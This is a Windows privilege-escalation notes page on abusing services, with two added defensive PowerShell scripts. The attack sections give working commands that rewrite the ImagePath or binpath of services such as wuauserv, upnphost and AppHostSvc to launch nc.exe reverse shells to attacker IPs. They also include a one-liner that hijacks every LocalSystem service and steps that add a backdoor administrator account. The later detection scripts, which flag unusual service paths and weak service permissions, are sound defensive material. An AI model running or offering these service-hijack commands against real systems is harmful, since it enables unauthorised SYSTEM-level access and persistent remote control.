# Abusing Services

## Powershell

Below is an example of how to abuse the Windows Update service (`wuauserv`) by rewriting its `ImagePath` registry value.

```powershell
# Show all services
Get-Service

# Show details of the services
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\*

# Shows details about the specific service
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\services\wuauserv

DependOnService     : {rpcss}
Description         : @%systemroot%\system32\wuaueng.dll,-106
DisplayName         : @%systemroot%\system32\wuaueng.dll,-105
ErrorControl        : 1
FailureActions      : {128, 81, 1, 0...}
ImagePath           : C:\Windows\system32\svchost.exe -k netsvcs -p
ObjectName          : LocalSystem
RequiredPrivileges  : {SeAuditPrivilege, SeCreateGlobalPrivilege, SeCreatePageFilePrivilege, SeTcbPrivilege...}
ServiceSidType      : 1
Start               : 3
SvcMemHardLimitInMB : 246
SvcMemMidLimitInMB  : 167
SvcMemSoftLimitInMB : 88
Type                : 32
PSPath              : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wuauserv
PSParentPath        : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services
PSChildName         : wuauserv
PSDrive             : HKLM
PSProvider          : Microsoft.PowerShell.Core\Registry

# Sets properties on the service
Set-Itemproperty -path 'HKLM:\system\currentcontrolset\services\wuauserv' -Name 'ImagePath' -value 'c:\temp\nc.exe 10.10.14.23 9001 -e powershell.exe' 

```

### Powershell Services Commands

Get all the details about a service. Useful for seeing whether you can stop and start it, etc.

```powershell
get-service UsoSvc | Select-Object *
get-service wuauserv | select Displayname,Status,ServiceName,Can*
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\* | Select-Object DisplayName, PSChildName, ImagePath  
```

Controlling the services

```powershell
# Starts
Start-Service wuauserv

# Restarts
Restart-Service wuauserv

# Stops the service
Stop-Service wuauserv

# Script: set ImagePath on every service that runs as LocalSystem
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\* | ?{$_.ObjectName -like "LocalSystem"} | Select PSChildName,ImagePath | ForEach-Object {$srvname=$_.PSChildName;Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Services\$srvname" -name ImagePath -Value 'C:\tmp\nc.exe 10.10.16.28 4444 -e powershell.exe'}
```

{% embed url="<https://theitbros.com/get-service-powershell/>" %}
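
A defender-side check for the change shown above, as an added example that is not part of the original notes: it lists Win32 services whose `ImagePath` binary sits outside `%SystemRoot%` and the Program Files directories, which is where a rewritten value such as `c:\temp\nc.exe ...` ends up. The trusted-directory list and the `Get-ServiceBinaryPath` helper are assumptions of this example.

```powershell
# Added example: flag service ImagePath values that point outside protected directories.
# Assumption: the trusted-directory list below; extend it for your environment.
$trusted = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) |
    Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') + '\' }

function Get-ServiceBinaryPath {
    param([string]$ImagePath)
    # Expand %SystemRoot%-style variables, then take the quoted path
    # or the text up to the first ".exe".
    $p = [Environment]::ExpandEnvironmentVariables($ImagePath).Trim()
    if ($p -match '^"([^"]+)"')        { return $Matches[1] }
    if ($p -match '^(.+?\.exe)(\s|$)') { return $Matches[1] }
    return ($p -split '\s+')[0]
}

$findings = Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' | ForEach-Object {
    $svc = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
    # Type 0x10 (own process) and 0x20 (shared process) are Win32 services; skip drivers.
    if (-not $svc.ImagePath -or -not ($svc.Type -band 0x30)) { return }

    $binary = Get-ServiceBinaryPath $svc.ImagePath
    $inTrustedDir = $false
    foreach ($dir in $trusted) {
        if ($binary.StartsWith($dir, [StringComparison]::OrdinalIgnoreCase)) {
            $inTrustedDir = $true
        }
    }
    if (-not $inTrustedDir) {
        [pscustomobject]@{
            Service   = $_.PSChildName
            Account   = $svc.ObjectName
            Binary    = $binary
            ImagePath = $svc.ImagePath
        }
    }
}

$findings | Sort-Object Account, Service | Format-Table -AutoSize -Wrap
```

Expect some legitimate hits, for example binaries under `C:\ProgramData`; review them once and then compare later runs against that reviewed list.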

## Service Control

Example 1: Using Service Control (`sc`) to abuse the Universal Plug and Play service (`upnphost`)

```
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.47 9097 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost

# In the event of failure
sc config SSDPSRV start= auto
net start SSDPSRV

# Start the reverse shell with privileges
net start upnphost


1) Created a user
  net user wtf wtf123 /add
  net localgroup administrators wtf /add
     
2) rdesktop -u wtf 10.11.1.13
```

Example 2: Application Host Helper Service

```
sc query AppHostSvc
sc config AppHostSvc binpath= "c:\temp\nc.exe -e cmd 10.10.14.37 9002"
sc stop AppHostSvc
sc start AppHostSvc
```

### SC Commands

```
sc queryex type= service state= all
```

- `state= all`: returns a list of all services
- `state= inactive`: returns a list of stopped services

To get a list of running services only, do not include the `state` field:

```
sc queryex type= service
```

```
   commands:
          query  [qryOpt]   Show status
          queryEx [qryOpt]  Show extended info - pid, flags
          GetDisplayName    Show the DisplayName
          GetKeyName        Show the ServiceKeyName
          EnumDepend        Show Dependencies
          qc                Show config - dependencies, full path etc
          start          START a service.
          stop           STOP a service
          pause          PAUSE a service.
          continue       CONTINUE a service.
          create         Create a service. (add it to the registry)
          config         permanently change the service configuration
          delete         Delete a service (from the registry)
          control        Send a control to a service
          interrogate    Send an INTERROGATE control request to a service
          Qdescription   Query the description of a service
          description    Change the description of a service
          Qfailure       Query the actions taken by a service upon failure
          failure        Change the actions taken by a service upon failure
          sdShow         Display a service's security descriptor using SDDL
          SdSet          Sets a service's security descriptor using SDDL
```
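
`sc config` only succeeds when the caller holds `SERVICE_CHANGE_CONFIG` on the service, and that grant is visible through `sdShow` from the list above. The added example below (not part of the original notes) parses `sc.exe sdshow` output and reports allow ACEs that give broad groups that right or the ability to rewrite the DACL; the trustee list and the `Get-RiskyServiceAce` helper are assumptions of this example.

```powershell
# Added example: report services whose DACL lets broad groups reconfigure them.
# Assumption: "broad" means the SDDL trustees below; adjust the list to your policy.
$broad = @{ WD = 'Everyone'; AU = 'Authenticated Users'; BU = 'BUILTIN\Users'
            IU = 'INTERACTIVE'; NU = 'NETWORK'; AN = 'ANONYMOUS LOGON' }
# SDDL right codes as they apply to service objects.
$risky = @{ DC = 'SERVICE_CHANGE_CONFIG'; WD = 'WRITE_DAC'; WO = 'WRITE_OWNER'
            GA = 'GENERIC_ALL'; GW = 'GENERIC_WRITE' }

function Get-RiskyServiceAce {
    param([string]$Sddl)
    # Keep only the DACL; a trailing S: section is the audit SACL.
    $dacl = ($Sddl -csplit 'S:')[0]
    # Allow ACEs only. ACEs whose rights are written as a hex mask are not decoded here.
    $pattern = '\(A;[^;]*;([A-Z]+);[^;]*;[^;]*;([^)]+)\)'
    foreach ($ace in [regex]::Matches($dacl, $pattern)) {
        $trustee = $ace.Groups[2].Value
        if (-not $broad.ContainsKey($trustee)) { continue }
        # Rights are concatenated two-letter codes, e.g. CCDCLCSWRPWP...
        $codes = [regex]::Matches($ace.Groups[1].Value, '..') | ForEach-Object { $_.Value }
        $hits  = $codes | Where-Object { $risky.ContainsKey($_) }
        if ($hits) {
            [pscustomobject]@{
                Trustee = $broad[$trustee]
                Rights  = ($hits | ForEach-Object { $risky[$_] }) -join ', '
            }
        }
    }
}

Get-Service | ForEach-Object {
    $name = $_.Name
    # sc.exe, not sc: in Windows PowerShell "sc" is an alias for Set-Content.
    $sddl = (& sc.exe sdshow $name) -join ''
    Get-RiskyServiceAce $sddl |
        Select-Object @{ n = 'Service'; e = { $name } }, Trustee, Rights
} | Format-Table -AutoSize
```

Any service this reports can have its descriptor tightened with `sc sdset` after the vendor's required rights are confirmed.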

